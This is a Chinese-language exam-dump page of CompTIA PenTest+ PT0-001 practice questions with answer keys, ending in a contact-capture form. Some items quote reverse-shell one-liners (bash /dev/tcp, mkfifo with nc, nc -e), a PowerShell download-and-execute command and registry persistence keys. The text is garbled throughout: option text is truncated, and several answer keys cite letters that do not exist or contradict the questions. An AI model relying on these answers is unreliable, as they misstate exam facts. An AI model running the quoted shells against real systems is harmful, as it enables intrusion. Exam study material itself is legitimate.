不想錯過任何事?

通過認證考試的技巧

最新考試新聞和折扣資訊

由我們的專家策劃和更新

是的,請向我發送時事通訊

CompTIA PT0-001 認證考試問題與答案, CompTIA PenTest+ 認證 | SPOTO

利用我們的綜合資源準備 CompTIA PenTest+ (PT0-001) 認證考試。我們的模擬測試包含最新的考試試題,旨在幫助您在備考過程中取得優異成績。PT0-001 認證的獨特之處在於它注重實踐能力,在雲和移動平臺以及傳統臺式機和服務器等不同環境中對考生進行測試。通過使用我們的考試試題、樣例題和考試轉儲包進行練習,您將對考試內容有深刻的理解,並爲應對挑戰做好充分準備。我們的模擬考試和考試模擬器可進一步提高您的準備程度,確保您在考試當天取得成功。利用我們的考試材料和考試答案,增強您的信心,實現您的 CompTIA PenTest+ 認證目標。
參加其他線上考試

問題 #1
滲透測試人員執行以下命令:以下哪項是攻擊者正在利用的本地主機漏洞?
A. 件權限不安全
B. 用程序白名單
C. 彈逃生
D. 寫服務
查看答案
正確答案: D
問題 #2
滲透測試人員正在撰寫一份報告,概述運行的總體風險水平。滲透測試人員應在報告的以下哪個部分中寫明?
A. 錄
B. 行摘要
C. 術摘要
D. 體
查看答案
正確答案: B
問題 #3
給出以下 Python 腳本:以下哪項是輸出結果的去向?
A. 着屏幕
B. 接網絡服務器
C. 件
D. /dev/null
查看答案
正確答案: A
問題 #4
滲透測試人員正在查看無線嗅探器的以下輸出結果:從上述信息可以推斷出以下哪項?
A. 件供應商
B. 道幹擾
C. 戶名
D. 要優勢
查看答案
正確答案: ACG
問題 #5
滲透測試人員希望從 IP 地址爲 10.0.0.20 的遠程入侵主機啓動圖形控制臺窗口,並在 IP 地址爲 192.168.1.10 的本地計算機上顯示終端。以下哪種方法可以完成這項任務?
A. 遠程計算機運行以下命令: export XHOST 192
B. 本地計算機運行以下命令: ssh -L4444:127
C. 遠程計算機運行以下命令: ssh -R6000:127
D. 本地計算機運行以下命令: nc -l -p 6000 然後,從遠程計算機運行以下命令: xterm | nc 192
查看答案
正確答案: D
問題 #6
一名安全顧問收到一份文件,其中概述了即將進行的滲透測試的範圍。該文檔包含 IP 地址和每個地址可被掃描的時間。以下哪項內容包含此信息?
A. 戰規則
B. 求建議書
C. 服務協議
D. 務影響分析
查看答案
正確答案: A
問題 #7
某客戶出於合規目的要求進行外部網絡滲透測試。在客戶與滲透測試人員討論期間,客戶表示不願意在測試期間將滲透測試人員的源 IP 地址添加到客戶的 IPS 白名單中。以下哪項是滲透測試人員的源 IP 地址應列入白名單的最佳理由?
A. 名單可防止針對 IPS 和支持日誌監控系統的無意 DoS 攻擊。
B. 第三方 IPS 系統進行滲透測試往往需要額外的文件和授權,可能會延誤時間敏感的測試。
C. PS 白名單規則需要經常更新,以保持與時俱進,不斷開發漏洞和新發現的弱點。
D. 試應側重於發現所有範圍內系統可能存在的安全問題,而不是確定 IPS 等主動防禦系統的相對有效性。
查看答案
正確答案: A
問題 #8
在物理安全評估過程中使用 "門下工具 "屬於以下哪種類型的入侵技術?
A. 鎖
B. 口傳感器觸發
C. 鎖
D. 路鎖
查看答案
正確答案: A
問題 #9
滲透測試人員正在對交換機執行 ARP 欺騙。要獲得最多信息,滲透測試員應欺騙以下哪項?
A. 戶端的 MAC 地址
B. 控制器的 MAC 地址
C. 絡服務器的 MAC 地址
D. 關的 MAC 地址
查看答案
正確答案: A
問題 #10
以下哪個命令可以啓動 Metasploit 數據庫?
A. msfconsole
B. 工作空間
C. msfvenom
D. db_init
E. db_connect
查看答案
正確答案: AB
問題 #11
以下哪種工具可用於執行憑證暴力破解攻擊?
A. 螅
B. 膛手約翰
C. 希貓
D. 子
查看答案
正確答案: D
問題 #12
一家醫療機構必須遵守當地法規,保護和證明受保個人的個人健康信息。在進行評估時,滲透測試人員應特別測試以下哪種情況?(請選擇兩項)。
A. NMP 陷阱數據的明文暴露
B. 息技術票務系統中的軟件錯誤
C. CA 定義的 S/MIME 證書模板
D. 過 HTTP 通信的健康信息
E. 錄服務器上的 DAR 加密
查看答案
正確答案: A
問題 #13
在一次網絡應用評估中,滲透測試人員發現服務器上可以執行任意命令。滲透測試人員想進一步實施攻擊,於是開始探索如何獲得反向 shell,回到位於 192.168.1.5 的攻擊機器。以下哪些是可能的方法?(請選擇兩項)。
A. NC 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
查看答案
正確答案: A
問題 #14
在權限有限的 Windows 系統上嘗試維護持久性時,測試人員應使用以下哪個註冊表鍵值?
A. key_classes_root
B. key_local_machine
C. key_current_user
D. key_current_config
查看答案
正確答案: D
問題 #15
一名滲透測試人員爲一家初創公司進行了一次安全評估。報告共列出十個漏洞,其中五個被確定爲關鍵漏洞。客戶沒有資源立即修復所有漏洞。在這種情況下,以下哪項是給客戶的最佳建議?
A. 對關鍵漏洞採用簡易補償控制措施,最大限度地降低風險,然後重新確定補救措施的優先次序。
B. 出可以最快速解決的問題,並首先解決這些問題。
C. 先實施影響最小的關鍵漏洞補救措施,然後再處理其他關鍵漏洞
D. 先修復最關鍵的漏洞,即使這意味着修復其他漏洞可能需要很長時間。
查看答案
正確答案: B
問題 #16
一名滲透測試人員想攻擊 NETBIOS 名稱服務。以下哪個命令最有可能利用 NETBIOS 名稱服務?
A. Arpspoof
B. nmap
C. 回復者
D. burpsuite
查看答案
正確答案: A
問題 #17
滲透測試人員報告說,一個面向互聯網的應用程序只使用了基本身份驗證。以下哪項是最佳修復策略?
A. 用 HTTP 嚴格傳輸安全性。
B. 用安全 cookie 標誌。
C. 密通信信道。
D. 除無效的用戶輸入
查看答案
正確答案: C
問題 #18
滲透測試人員在獲得 Linux 系統的初始低權限訪問權限後,在用戶的主文件夾中發現了一個名爲 "changepass "的有趣二進制文件。 -sr-xr-x 1 root root 6443 2017 年 10 月 18 日 /home/user/changepass 使用 "字符串 "從 changepass 中打印 ASCII 可打印字符,測試人員注意到以下內容:$ strings changepass exit setuid strcmp GLIBC_2.0 ENV_PATH %s/changepw malloc strlen 考慮到這些信息,以下哪種利用路徑最有可能實現 root p
A. changepass 複製到一個可寫目錄,並將 ENV_PATH 環境變量導出爲名爲 changepw 的令牌竊取二進制文件的路徑。然後運行 changepass。
B. 同一目錄下創建一個 changepass 副本,命名爲 changepw。將 ENV_PATH 環境變量導出爲"/home/user/"路徑。然後運行 changepass。
C. ENV_PATH 環境變量導出爲包含名爲 changepw 的令牌竊取二進制文件的可寫目錄路徑。然後運行 changepass。
D. ENV_PATH 環境變量導出爲"/usr/local/bin "路徑後,使用 sudo 在當前目錄下運行 changepass。
查看答案
正確答案: A
問題 #19
滲透測試約定協議的下列哪項屬性對觀察和測試最高負載下的生產系統影響最大?
A. 建關鍵生產系統範圍
B. 定測試訪問時間安排
C. 立白盒測試參與
D. 管理層籤字批准侵入性測試
查看答案
正確答案: C
問題 #20
在以下哪種情況下,測試人員會執行 Kerberoasting 攻擊?
A. 試人員入侵了 Windows 設備並泄露了 LSA 祕密。
B. 試人員需要檢索 SAM 數據庫並破解密碼哈希值。
C. 試人員已入侵了一個權限有限的用戶,需要對其他賬戶進行橫向移動。
D. 試人員入侵了一個賬戶,需要從系統中轉儲哈希值和明文密碼。
查看答案
正確答案: B
問題 #21
測試期間,在客戶的核心服務器上發現了一個關鍵漏洞。下一步應採取以下哪項措施?
A. 用受影響服務的網絡端口。
B. 成所有調查結果,然後提交給客戶。
C. 時向客戶通報調查結果的詳情。
D. 目標脫機,使其無法被攻擊者利用。
查看答案
正確答案: D
問題 #22
一位安全評估員正在嘗試製作專門的 XML 文件,以測試 Windows 應用程序輸入過程中解析功能的安全性。在開始測試應用程序之前,評估人員應要求組織提供以下哪項內容?
A. OAP 信息示例
B. EST API 文檔
C. 議模糊工具
D. 用的 XSD 文件
查看答案
正確答案: A
問題 #23
以下哪段摘錄來自公司政策?
A. 工密碼必須至少包含八個字符,其中一個爲字母數字。
B. 撥打 800-passwd1 聯繫服務臺,進行密碼重置。
C. 工必須使用強大的密碼訪問公司資產。
D. 司系統必須使用 MD5 哈希算法存儲密碼。
查看答案
正確答案: B
問題 #24
在一臺被攻擊計算機的歷史文件中發現以下一行。攻擊者運行了以下命令: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 以下哪項描述了該命令的作用?
A. 行端口掃描。
B. 取網絡服務器的橫幅。
C. TTY 重定向到遠程系統。
D. 除所提供 IP 的錯誤日誌。
查看答案
正確答案: AC
問題 #25
一名滲透測試人員通過對一名 IT 部門人員進行網絡釣魚,獲取了初始 VPN 用戶域憑據。之後,滲透測試人員通過 VPN 獲取了哈希值,並使用字典攻擊輕鬆破解了它們。建議採取以下哪些補救措施?(請選擇三個)。
A. 求所有員工參加安全意識培訓。
B. 遠程訪問實施雙因素身份驗證。
C. 裝入侵防禦系統。
D. 高密碼複雜性要求。
E. 裝安全信息事件監控解決方案。
F. 止 IT 部門成員以管理員身份交互登錄。
G. 升級用於 VPN 解決方案的密碼套件。
查看答案
正確答案: A
問題 #26
滲透測試人員已成功部署了邪惡孿生系統,並開始看到一些受害者流量。下一步,滲透測試人員要捕獲所有未加密的受害者網絡流量。以下哪種方法能最好地實現這一目標?
A. 行 HTTP 降級攻擊。
B. 取用戶憑證來解密流量。
C. 行 MITM 攻擊。
D. 過冒充可信 CA 實施 CA 攻擊。
查看答案
正確答案: A
問題 #27
請考慮以下 PowerShell 命令:powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Cmdlet 以下哪項最好地描述了該命令執行的操作?
A. 置執行策略。
B. 行遠程腳本。
C. 行編碼命令。
D. 例化一個對象
查看答案
正確答案: C
問題 #28
一家能源公司與一家安全公司籤訂合同,對一家發電廠進行滲透測試,該發電廠採用 ICS 管理髮電和冷卻。以下哪項是公司在準備評估時必須考慮的此類環境的獨特因素?
A. 擇一套適當的安全測試工具
B. 合控制系統組件的額定電流和負載
C. 在的操作和安全隱患
D. 試所用硬件的電氣認證
查看答案
正確答案: DE
問題 #29
滲透測試人員發現,一個公共網絡服務器上有幾個高位端口正在監聽。但是,系統所有者說應用程序只使用 443 端口。建議最好使用以下哪種方法?
A. 應用程序轉到另一個端口。
B. 443 端口過濾爲特定 IP 地址。
C. 施網絡應用程序防火牆。
D. 用不需要的服務。
查看答案
正確答案: D
問題 #30
滲透測試人員正在執行遠程掃描,以確定服務器羣是否符合公司的軟件基線。滲透測試人員應執行以下哪些操作來驗證是否符合基線?
A. 現掃描
B. 形掃描
C. 面掃描
D. 證掃描
查看答案
正確答案: B
問題 #31
一名滲透測試人員正在測試一個銀行應用程序,並發現了一個漏洞。測試人員以非特權用戶身份登錄,他不應該訪問任何數據。下面是來自網絡攔截代理的數據:正在利用以下哪種類型的漏洞?
A. 制瀏覽漏洞
B. 數污染脆弱性
C. 件上傳漏洞
D. ookie 枚舉
查看答案
正確答案: A
問題 #32
在全面安全評估過程中,以下哪項是通過實際接觸對目標實施社會工程的先決條件?
A. 急出口的位置
B. 備藉口
C. 肩膀撞擊受害者
D. 隨受害者
查看答案
正確答案: A
問題 #33
一名安全分析師收到了一份詳細的滲透報告,該報告是針對該組織的 DMZ 環境執行的。報告指出,有一項發現的 CVSS 基本分值爲 10.0。利用此漏洞需要達到以下哪種難度級別?
A. 難;外圍系統通常位於防火牆後面。
B. 點困難;需要強大的處理能力才能利用。
C. 不足道;利用這一發現幾乎不費吹灰之力。
D. 可能;外部主機已加固以防止攻擊。
查看答案
正確答案: C
問題 #34
一個惡意用戶想對一臺計算機實施 MITM 攻擊。計算機網絡配置如下:IP: 192.168.1.20 NETMASK: 255.255.255.0 默認網關:192.168.1.254 DHCP: 192.168.1.253 DNS: 192.168.10.10, 192.168.20.10 惡意用戶應執行以下哪些命令來執行 MITM 攻擊?
A. arpspoof -c both -r -t 192
B. arpspoof -t 192
C. arpspoof -c both -t 192
D. arpspoof -r -t 192
查看答案
正確答案: D
問題 #35
一名滲透測試人員獲得了一名營銷人員設備的訪問權限。滲透測試人員希望確保一旦訪問被發現,可以重新獲得設備控制權。滲透測試人員應使用以下哪些操作來保持對設備的持久性?(請選擇兩項)。
A. HKLM\Software\Microsoft\CurrentVersion\Run 中添加一個條目,以調用 au57d
B. C:\windows\system32\drivers\etc\hosts 中爲 12
C. C:\users\%username\local\appdata\roaming\temp\au57d
D. Windows 中創建名爲 RTAudio 的假服務,手動執行。
E. HKLM\CurrentControlSet\Services\RTAudio 中爲 RTAudio 添加一個條目。
F. 建一個調用 C:\windows\system32\drivers\etc\hosts 的計劃任務。
查看答案
正確答案: AC
問題 #36
滲透測試人員能夠在文本框中輸入 SQL 注入命令,並訪問數據庫中存儲的信息。以下哪項建議是緩解該漏洞的最佳建議?
A. 機化登錄憑證。
B. 裝基於主機的入侵檢測。
C. 現輸入規範化。
D. 行系統加固。
查看答案
正確答案: AE
問題 #37
滲透測試人員會利用以下哪些工具來執行 OSINT? 請選擇兩項)。
A. 丹
B. 置
C. eEF
D. ireshark
E. 爾泰戈
F. 電機
查看答案
正確答案: CD
問題 #38
以下哪項是滲透測試人員在任務結束時運行 chkconfig --del servicename 命令的原因?
A. 除持久性
B. 用持久性
C. 告持久性
D. 查持久性
查看答案
正確答案: A
問題 #39
以下哪種情況會導致滲透測試人員在測試過程中與系統所有者/客戶溝通?
A. 試人員在系統中發現可識別個人身份的數據。
B. 統顯示出先前未經授權入侵的證據。
C. 個系統缺乏硬化。
D. 統在被嘗試利用後變得不可用。
E. 試人員在範圍外的系統中發現了一項結果。
查看答案
正確答案: A
問題 #40
一名滲透測試人員想編寫一個腳本,找出某個 IP 地址範圍的所有 RPTR 記錄。以下哪種方法最有效?
A. nmap -p 53 -oG dnslist
B. nslookup -ns 8
C. for x in {1
D. dig -r > echo "8
查看答案
正確答案: D
問題 #41
滲透測試人員在網絡應用程序滲透測試中發現內容安全策略標頭丟失。滲透測試人員最有可能採用以下哪種技術?
A. 令注入攻擊
B. 擊劫持攻擊
C. 錄遍歷攻擊
D. 程文件包含攻擊
查看答案
正確答案: D
問題 #42
滲透測試人員查看一個網絡應用程序的掃描結果。以下哪個漏洞最爲關鍵,應優先利用?
A. 儲的 XSS
B. 露填充路徑
C. 期證書
D. 擊劫持
查看答案
正確答案: D
問題 #43
滲透測試者入侵了一個可以通過 443 端口不受限制地訪問任何主機的系統。滲透測試員希望創建一個從受害者返回攻擊者的反向外殼。滲透測試者最有可能使用以下哪種方法?
A. perl -e 'use SOCKET'; $i='; $p='443;
B. ssh superadmin@-p 443
C. nc -e /bin/sh443
D. bash -i >& /dev/tcp//443 0>&1
查看答案
正確答案: D
問題 #44
以下哪項是滲透測試人員在任務結束時運行 chkconfig --del servicename 命令的原因?
A. 除持久性
B. 用持久性
C. 告持久性
D. 查持久性
查看答案
正確答案: A
問題 #45
以下哪項最恰當地描述了綜合控制系統(如電力設施、天然氣設施、水壩和核設施中使用的控制系統)的一些重大安全弱點?
A. 合控制系統供應商在實施適當的安全控制方面進展緩慢。
B. 合監控中心的工作人員沒有接受過充分的培訓,無法履行基本職責。
C. 鍵設備的替換設備稀缺。
D. 合監控系統設施缺乏合規性。
查看答案
正確答案: B
問題 #46
基於消費者的物聯網設備通常不如爲傳統臺式電腦構建的系統安全。以下哪項最能說明這種情況的原因?
A. 發物聯網設備的製造商不太關注安全問題。
B. 理員很難全面實施相同的安全標準。
C. 聯網系統通常缺乏更安全解決方案所需的硬件能力。
D. 管機構對物聯網系統的安全要求通常較低。
查看答案
正確答案: A

提交後看答案

請提交您的電子郵件和WhatsApp以獲取問題的答案。

注意:請確保您的電子郵件 ID 和 Whatsapp 有效,以便您獲得正確的考試結果。

電子郵件:
WhatsApp/電話號碼: